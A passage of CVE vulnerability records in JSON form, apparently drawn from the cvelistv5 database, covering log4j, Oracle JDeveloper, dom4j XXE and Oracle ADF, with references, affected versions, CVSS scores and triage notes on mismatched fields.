"MLIST", url: "https://lists.apache.org/thread.html/r3784834e80df2f284577a5596340fb84346c91a2dea6a073e65e3397@%3Cissues.activemq.apache.org%3E", }, { name: "[geode-issues] 20200831 [jira] [Created] (GEODE-8471) Dependency security issues in 
geode-core-1.12", refsource: "MLIST", url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E", }, { name: "https://www.oracle.com/security-alerts/cpuoct2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { name: "https://www.oracle.com/security-alerts/cpujan2021.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { name: "[doris-commits] 20210402 [GitHub] [incubator-doris] zh0122 opened a new pull request #5594: [FE][Bug]Update log4j-web to fix a security issue", refsource: "MLIST", url: "https://lists.apache.org/thread.html/rcbb79023a7c8494cb389cd3d95420fa9e0d531ece0b780b8c1f99422@%3Ccommits.doris.apache.org%3E", }, { name: "[beam-issues] 20210528 [jira] [Created] (BEAM-12422) Vendored gRPC 1.36.0 is using a log4j version with security issues", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r0831e2e52a390758ce39a6193f82c11c295175adce6e6307de28c287@%3Cissues.beam.apache.org%3E", }, { name: "https://www.oracle.com/security-alerts/cpuApr2021.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { name: "[beam-github] 20210701 [GitHub] [beam] lukecwik commented on pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", refsource: "MLIST", url: "https://lists.apache.org/thread.html/rbfa7a0742be4981a3f9356a23d0e1a5f2e1eabde32a1a3d8e41420f8@%3Cgithub.beam.apache.org%3E", }, { name: "[beam-github] 20210701 [GitHub] [beam] lukecwik opened a new pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r23369fd603eb6d62d3b883a0a28d12052dcbd1d6d531137124cd7f83@%3Cgithub.beam.apache.org%3E", }, { name: "[beam-github] 20210701 [GitHub] [beam] codecov[bot] commented on pull request #15113: [BEAM-12422] Upgrade log4j version not affected by 
CVE-2017-5645", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r9d5c1b558a15d374bd5abd2d3ae3ca7e50e796a0efdcf91e9c5b4cdd@%3Cgithub.beam.apache.org%3E", }, { name: "[beam-github] 20210701 [GitHub] [beam] codecov[bot] edited a comment on pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r94b5aae09c4bcff5d06cf641be17b00bd83ba7e10cad737bf16a1b8f@%3Cgithub.beam.apache.org%3E", }, { name: "[beam-github] 20210701 [GitHub] [beam] suztomo commented on pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", refsource: "MLIST", url: "https://lists.apache.org/thread.html/rdbd579dc223f06af826d7de340218ee2f80d8b43fa7e4decb2a63f44@%3Cgithub.beam.apache.org%3E", }, { name: "https://www.oracle.com/security-alerts/cpuoct2021.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { name: "https://www.oracle.com/security-alerts/cpujan2022.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", assignerShortName: "apache", cveId: "CVE-2017-5645", datePublished: "2017-04-17T21:00:00", dateReserved: "2017-01-29T00:00:00", dateUpdated: "2024-08-05T15:11:47.391Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2018-2711
Vulnerability from cvelistv5
| URL | Tags |
|---|---|
| http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html | x_refsource_CONFIRM |
| http://www.securitytracker.com/id/1040207 | vdb-entry, x_refsource_SECTRACK |
| http://www.securityfocus.com/bid/102539 | vdb-entry, x_refsource_BID |
| Vendor | Product | Version |
|---|---|---|
| Oracle Corporation | JDeveloper | 11.1.1.2.4, 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 12.1.3.0.0 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-05T04:29:44.131Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { name: "1040207", tags: [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred", ], url: "http://www.securitytracker.com/id/1040207", }, { name: "102539", tags: [ "vdb-entry", "x_refsource_BID", "x_transferred", ], url: "http://www.securityfocus.com/bid/102539", }, ], title: "CVE Program Container", }, { metrics: [ { other: { content: { id: "CVE-2018-2711", options: [ { Exploitation: "none", }, { Automatable: "no", }, { "Technical Impact": "partial", }, ], role: "CISA Coordinator", timestamp: "2024-10-03T19:24:30.502336Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-10-03T20:27:37.811Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, ], cna: { affected: [ { product: "JDeveloper", vendor: "Oracle Corporation", versions: [ { status: "affected", version: "11.1.1.2.4", }, { status: "affected", version: "11.1.1.7.0", }, { status: "affected", version: "11.1.1.7.1", }, { status: "affected", version: "11.1.1.9.0", }, { status: "affected", version: "12.1.3.0.0", }, ], }, ], datePublic: "2018-01-03T00:00:00", descriptions: [ { lang: "en", value: "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Security Framework). Supported versions that are affected are 11.1.1.2.4, 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. 
Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle JDeveloper accessible data as well as unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).", }, ], problemTypes: [ { descriptions: [ { description: "Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle JDeveloper accessible data as well as unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data.", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2018-01-18T10:57:01", orgId: "43595867-4340-4103-b7a2-9a5208d29a85", shortName: "oracle", }, references: [ { tags: [ "x_refsource_CONFIRM", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { name: "1040207", tags: [ "vdb-entry", "x_refsource_SECTRACK", ], url: "http://www.securitytracker.com/id/1040207", }, { name: "102539", tags: [ "vdb-entry", "x_refsource_BID", ], url: "http://www.securityfocus.com/bid/102539", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "secalert_us@oracle.com", ID: "CVE-2018-2711", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "JDeveloper", version: { version_data: [ { version_affected: "=", version_value: "11.1.1.2.4", }, { version_affected: "=", version_value: "11.1.1.7.0", }, { version_affected: "=", version_value: "11.1.1.7.1", }, { version_affected: "=", version_value: 
"11.1.1.9.0", }, { version_affected: "=", version_value: "12.1.3.0.0", }, ], }, }, ], }, vendor_name: "Oracle Corporation", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Security Framework). Supported versions that are affected are 11.1.1.2.4, 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle JDeveloper accessible data as well as unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. 
Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle JDeveloper accessible data as well as unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data.", }, ], }, ], }, references: { reference_data: [ { name: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", refsource: "CONFIRM", url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { name: "1040207", refsource: "SECTRACK", url: "http://www.securitytracker.com/id/1040207", }, { name: "102539", refsource: "BID", url: "http://www.securityfocus.com/bid/102539", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "43595867-4340-4103-b7a2-9a5208d29a85", assignerShortName: "oracle", cveId: "CVE-2018-2711", datePublished: "2018-01-18T02:00:00", dateReserved: "2017-12-15T00:00:00", dateUpdated: "2024-10-03T20:27:37.811Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2020-10683
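Vulnerability from cvelistv5

Note: the CNA `affected` field in this record is `n/a` for vendor, product and version. The affected range (dom4j before 2.0.3 and 2.1.x before 2.1.3) appears only in the free-text description, so inventory or scanner matching that keys on the structured product/version fields will not flag this record.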
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-04T11:06:11.156Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { name: "openSUSE-SU-2020:0719", tags: [ "vendor-advisory", "x_refsource_SUSE", "x_transferred", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00061.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/dom4j/dom4j/releases/tag/version-2.1.3", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/dom4j/dom4j/commit/a8228522a99a02146106672a34c104adbda5c658", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20200518-0002/", }, { name: "USN-4575-1", tags: [ "vendor-advisory", "x_refsource_UBUNTU", "x_transferred", ], url: "https://usn.ubuntu.com/4575-1/", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/dom4j/dom4j/issues/87", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/dom4j/dom4j/commits/version-2.0.3", }, { name: "[velocity-dev] 20201203 Use of external DTDs - CVE-2020-10683", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r51f3f9801058e47153c0ad9bc6209d57a592fc0e7aefd787760911b8%40%3Cdev.velocity.apache.org%3E", }, { name: "[velocity-dev] 20201203 Re: Use of external DTDs - CVE-2020-10683", tags: [ "mailing-list", "x_refsource_MLIST", 
"x_transferred", ], url: "https://lists.apache.org/thread.html/r91c64cd51e68e97d524395474eaa25362d564572276b9917fcbf5c32%40%3Cdev.velocity.apache.org%3E", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { name: "[freemarker-notifications] 20210906 [jira] [Created] (FREEMARKER-190) The jar dom4j has known security issue that Freemarker compiles dependend on it", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rb1b990d7920ae0d50da5109b73b92bab736d46c9788dd4b135cb1a51%40%3Cnotifications.freemarker.apache.org%3E", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], datePublic: "2020-04-12T00:00:00", descriptions: [ { lang: "en", value: "dom4j before 2.0.3 and 2.1.x before 2.1.3 allows external DTDs and External Entities by default, which might enable XXE attacks. 
However, there is popular external documentation from OWASP showing how to enable the safe, non-default behavior in any application that uses dom4j.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2022-07-25T16:13:36", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { name: "openSUSE-SU-2020:0719", tags: [ "vendor-advisory", "x_refsource_SUSE", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00061.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { tags: [ "x_refsource_MISC", ], url: "https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html", }, { tags: [ "x_refsource_MISC", ], url: "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/dom4j/dom4j/releases/tag/version-2.1.3", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/dom4j/dom4j/commit/a8228522a99a02146106672a34c104adbda5c658", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://security.netapp.com/advisory/ntap-20200518-0002/", }, { name: "USN-4575-1", tags: [ "vendor-advisory", "x_refsource_UBUNTU", ], url: "https://usn.ubuntu.com/4575-1/", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { tags: [ "x_refsource_MISC", ], url: "https://github.com/dom4j/dom4j/issues/87", }, { tags: [ "x_refsource_MISC", ], url: "https://github.com/dom4j/dom4j/commits/version-2.0.3", }, { name: "[velocity-dev] 20201203 Use of external DTDs - CVE-2020-10683", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r51f3f9801058e47153c0ad9bc6209d57a592fc0e7aefd787760911b8%40%3Cdev.velocity.apache.org%3E", }, { name: "[velocity-dev] 20201203 Re: Use of external DTDs - CVE-2020-10683", tags: [ "mailing-list", 
"x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r91c64cd51e68e97d524395474eaa25362d564572276b9917fcbf5c32%40%3Cdev.velocity.apache.org%3E", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { name: "[freemarker-notifications] 20210906 [jira] [Created] (FREEMARKER-190) The jar dom4j has known security issue that Freemarker compiles dependend on it", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rb1b990d7920ae0d50da5109b73b92bab736d46c9788dd4b135cb1a51%40%3Cnotifications.freemarker.apache.org%3E", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "cve@mitre.org", ID: "CVE-2020-10683", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "dom4j before 2.0.3 and 2.1.x before 2.1.3 allows external DTDs and External Entities by default, which might enable XXE attacks. 
However, there is popular external documentation from OWASP showing how to enable the safe, non-default behavior in any application that uses dom4j.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "openSUSE-SU-2020:0719", refsource: "SUSE", url: "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00061.html", }, { name: "https://www.oracle.com/security-alerts/cpujul2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { name: "https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html", refsource: "MISC", url: "https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html", }, { name: "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", refsource: "MISC", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", }, { name: "https://github.com/dom4j/dom4j/releases/tag/version-2.1.3", refsource: "CONFIRM", url: "https://github.com/dom4j/dom4j/releases/tag/version-2.1.3", }, { name: "https://github.com/dom4j/dom4j/commit/a8228522a99a02146106672a34c104adbda5c658", refsource: "CONFIRM", url: "https://github.com/dom4j/dom4j/commit/a8228522a99a02146106672a34c104adbda5c658", }, { name: "https://security.netapp.com/advisory/ntap-20200518-0002/", refsource: "CONFIRM", url: "https://security.netapp.com/advisory/ntap-20200518-0002/", }, { name: "USN-4575-1", refsource: "UBUNTU", url: "https://usn.ubuntu.com/4575-1/", }, { name: "https://www.oracle.com/security-alerts/cpuoct2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { name: "https://github.com/dom4j/dom4j/issues/87", refsource: "MISC", url: "https://github.com/dom4j/dom4j/issues/87", }, { name: "https://github.com/dom4j/dom4j/commits/version-2.0.3", refsource: "MISC", url: "https://github.com/dom4j/dom4j/commits/version-2.0.3", }, { name: 
"[velocity-dev] 20201203 Use of external DTDs - CVE-2020-10683", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r51f3f9801058e47153c0ad9bc6209d57a592fc0e7aefd787760911b8@%3Cdev.velocity.apache.org%3E", }, { name: "[velocity-dev] 20201203 Re: Use of external DTDs - CVE-2020-10683", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r91c64cd51e68e97d524395474eaa25362d564572276b9917fcbf5c32@%3Cdev.velocity.apache.org%3E", }, { name: "https://www.oracle.com/security-alerts/cpujan2021.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { name: "https://www.oracle.com/security-alerts/cpuApr2021.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { name: "https://www.oracle.com//security-alerts/cpujul2021.html", refsource: "MISC", url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { name: "[freemarker-notifications] 20210906 [jira] [Created] (FREEMARKER-190) The jar dom4j has known security issue that Freemarker compiles dependend on it", refsource: "MLIST", url: "https://lists.apache.org/thread.html/rb1b990d7920ae0d50da5109b73b92bab736d46c9788dd4b135cb1a51@%3Cnotifications.freemarker.apache.org%3E", }, { name: "https://www.oracle.com/security-alerts/cpuoct2021.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { name: "https://www.oracle.com/security-alerts/cpujan2022.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { name: "https://www.oracle.com/security-alerts/cpujul2022.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2020-10683", datePublished: "2020-05-01T18:55:25", dateReserved: "2020-03-20T00:00:00", dateUpdated: "2024-08-04T11:06:11.156Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", 
dataVersion: "5.1", }
cve-2019-2899
Vulnerability from cvelistv5
| URL | Tags |
|---|---|
| http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html | x_refsource_MISC |
| https://www.oracle.com/security-alerts/cpuapr2020.html | x_refsource_MISC |
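| Vendor | Product | Version |
|---|---|---|
| Oracle Corporation | Hyperion Financial Management | 11.1.2.4 |

Note: the structured `affected` field of this record names Hyperion Financial Management 11.1.2.4, while its description attributes the vulnerability to Oracle JDeveloper and ADF (component: OAM), versions 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 and 12.2.1.3.0. Matching on the structured field alone will miss the JDeveloper and ADF versions, so check both when triaging.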
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-04T19:03:43.148Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_MISC", "x_transferred", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, ], title: "CVE Program Container", }, { metrics: [ { other: { content: { id: "CVE-2019-2899", options: [ { Exploitation: "none", }, { Automatable: "no", }, { "Technical Impact": "partial", }, ], role: "CISA Coordinator", timestamp: "2024-10-01T16:15:27.715088Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-10-01T16:32:46.259Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, ], cna: { affected: [ { product: "Hyperion Financial Management", vendor: "Oracle Corporation", versions: [ { status: "affected", version: "11.1.2.4", }, ], }, ], descriptions: [ { lang: "en", value: "Vulnerability in the Oracle JDeveloper and ADF product of Oracle Fusion Middleware (component: OAM). Supported versions that are affected are 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle JDeveloper and ADF. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle JDeveloper and ADF accessible data. CVSS 3.0 Base Score 2.4 (Confidentiality impacts). 
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N).", }, ], metrics: [ { cvssV3_0: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 2.4, baseSeverity: "LOW", confidentialityImpact: "LOW", integrityImpact: "NONE", privilegesRequired: "HIGH", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N", version: "3.0", }, }, ], problemTypes: [ { descriptions: [ { description: "Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle JDeveloper and ADF. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle JDeveloper and ADF accessible data.", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2020-04-15T13:29:43", orgId: "43595867-4340-4103-b7a2-9a5208d29a85", shortName: "oracle", }, references: [ { tags: [ "x_refsource_MISC", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "secalert_us@oracle.com", ID: "CVE-2019-2899", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "Hyperion Financial Management", version: { version_data: [ { version_affected: "=", version_value: "11.1.2.4", }, ], }, }, ], }, vendor_name: "Oracle Corporation", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "Vulnerability in the Oracle JDeveloper and ADF product of Oracle Fusion Middleware (component: OAM). Supported versions that are affected are 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 and 12.2.1.3.0. 
Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle JDeveloper and ADF. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle JDeveloper and ADF accessible data. CVSS 3.0 Base Score 2.4 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N).", }, ], }, impact: { cvss: { baseScore: "2.4", vectorString: "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N", version: "3.0", }, }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle JDeveloper and ADF. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle JDeveloper and ADF accessible data.", }, ], }, ], }, references: { reference_data: [ { name: "http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", refsource: "MISC", url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { name: "https://www.oracle.com/security-alerts/cpuapr2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "43595867-4340-4103-b7a2-9a5208d29a85", assignerShortName: "oracle", cveId: "CVE-2019-2899", datePublished: "2019-10-16T17:40:53", dateReserved: "2018-12-14T00:00:00", dateUpdated: "2024-10-01T16:32:46.259Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }